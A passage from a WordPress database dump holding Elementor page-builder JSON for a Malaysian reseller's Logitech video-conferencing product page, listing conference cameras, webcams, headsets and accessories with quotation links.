meeting.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0f58cd2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"e316d80\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>QUALITY OPTICS<\\/h4><p>BCC950 features quality optics so you enjoy bright, clear video with accurate color rendition and sharpness. Pan 180\\u00b0 across the room, and zoom in up to 1.2x in HD or 4x in SD to focus on the details.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"15bb0bc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1097234\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"05b1de0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"3\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5747,2980,'_wp_page_template','template-fullwidth.php'),(5748,2980,'_elementor_edit_mode','builder'),(5749,2980,'_elementor_template_type','post'),(5750,2980,'_elementor_data','[{\"id\":\"71c39ac\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"e477157\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":38.387,\"content_position\":\"center\"},\"elements\":[{\"id\":\"1e2e480\",\"elType\":\"widget\",\"settings\":{\"title\":\"VIDEO CONFERENCING\\u200b\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"f051e18\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":61.61},\"elements\":[{\"id\":\"5e28b2d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aad4243\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ab857b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3866d6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>CONFERENCE CAMERAS<\\/h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0326f20\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"56b446e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"963d60b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"eeaf14e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP<\\/h3><p>Video conferencing for mid to large-sized meeting rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c880fed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"7bbbcce\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-group\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1e67209\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8a768bb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-system-b2b-pdp.png\",\"id\":1249}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"59f66f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally<\\/h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5e9935e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"14b03e7\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-rally\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a473ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":20},\"elements\":[{\"id\":\"009aa7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-conference-cam.png\",\"id\":1316},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6572b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MeetUp<\\/h4><p>All-in-One ConferenceCam with 120\\u00b0 field of view and integrated audio, perfect for small conference and huddle rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9ea3deb\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"ca314b4\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-meetup\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2042b97\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2e8e54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1b201c2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-connect.png\",\"id\":1318}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"17f6307\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>CONNECT<\\/h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ed3411\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"f0bb209\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-connect\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a08e65\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93261d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-bcc950.png\",\"id\":1319}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0e23f40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BCC950<\\/h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe5fab\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"67ffddd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":20},\"elements\":[{\"id\":\"177327c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ptz-pro-2-camera.png\",\"id\":1321}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ff04afc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PTZ PRO 2<\\/h3><p>HD 1080p video camera with enhanced pan\\/tilt and zoom<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e3ff14a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"666088c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-ptz-pro-2\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a021238\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5be05f3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"aea13c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"790f00c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-camera-e1544499263206.png\",\"id\":1247}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"322d778\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally Camera<\\/h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe363c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"c6bed49\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-rally\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"3862603\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"8e81386\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"51d763e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7410c4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>VC ROOM SOLUTIONS<\\/h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"75fc0cb\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"345e12f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b63babc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be0e6a0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\",\"id\":1397},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9005f6d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMARTDOCK<\\/h3><p>Secure meeting room console designed for Skype Room Systems<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b9dedfe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9b49863\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"433835b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ff5eeb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a4767f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>WEBCAMS<\\/h2><p>Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0f3d021\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5fe6e79\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b4e24a2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/briopictograms.png\",\"id\":1332}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9a3535d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BRIO<\\/h3><p>4K Ultra HD webcam with RightLight\\u2122 3 with HDR<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"fba2ea6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c05d87c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12d5f47\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c930e-webcam.png\",\"id\":1334}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91bee63\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech C930e<\\/h3><p>Business webcam with a wide field of view and HD digital zoom<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4e520f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c71a30b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f62006e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c925e-webcam.png\",\"id\":1336}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a94baf9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech C925e<\\/h3><p>Affordable 1080p HD webcam with integrated privacy shade<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"086da3d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae10c21\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"93d444d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5ab9b49\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"858059a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/b525-pdp-2017-refresh.png\",\"id\":1354}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca4407c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech B525<\\/h3><p>Ideal for on-the-go professionals with a compact, foldable, 360\\u00b0 swivel design<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"009af69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"fe5d066\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9072abf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6c257c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c2db587\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>HEADSETS<\\/h2><p>Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aea83c8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a1561a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5e39286\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ece341e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/h570e-headset.png\",\"id\":1364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e3497b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech H570e Headset<\\/h3><p>Comfortable, affordable, and built to last<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"785345f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b698d09\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"16f5dd5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c4a4a72\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":20,\"padding\":{\"unit\":\"px\",\"top\":\"45\",\"right\":\"45\",\"bottom\":\"45\",\"left\":\"45\",\"isLinked\":true}},\"elements\":[{\"id\":\"6b09cb7\",\"elType\":\"widget\",\"settings\":{\"title\":\"VIDEO COLLABORATION ACCESSORIES\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f31cb09\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"12ed18d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"38d7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/smartdock-extender-box.png\",\"id\":1386}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9cbda85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMARTDOCK EXTENDER BOX<\\/h3><p>Connectivity options for Logitech SmartDock<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f575023\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"08edb2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"85c2829\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-screen-share.png\",\"id\":1391}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f3f660b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech Screen Share<\\/h3><p>A fast, familiar, and affordable way to share content in the conference room and into online meetings.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"77dadd4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b20ef35\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3211191\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-expansion-microphones.png\",\"id\":1392}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2a65808\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP EXPANSION MICS<\\/h3><p>Add-on mics for larger groups<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6a71d0d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac7c83c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f6834a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"13a33a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\",\"id\":1397}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5b6e717\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech SmartDock Flex<\\/h3><p>Expansion Kit for Logitech SmartDock<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5014200\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"366eb59\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dc59d5f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-15m-extended-cable.png\",\"id\":1401}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e222e61\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP 15M EXTENDED CABLE<\\/h3><p>15 meter cable for video conferences in larger rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b6bbdef\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b7c0191\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8128e7a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-10m-extended-cable.png\",\"id\":1404}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a506052\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP 10M EXTENDED CABLE<\\/h3><p>10 meter cable, ideal for large conference rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"da882ae\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"509c931\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2438d41\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f231a38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bc953c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-expansion-mics.png\",\"id\":1406}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"db20012\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>EXPANSION MIC FOR MEETUP<\\/h3><p>Add-on microphone for huddle room flexibility<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"33673e4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get 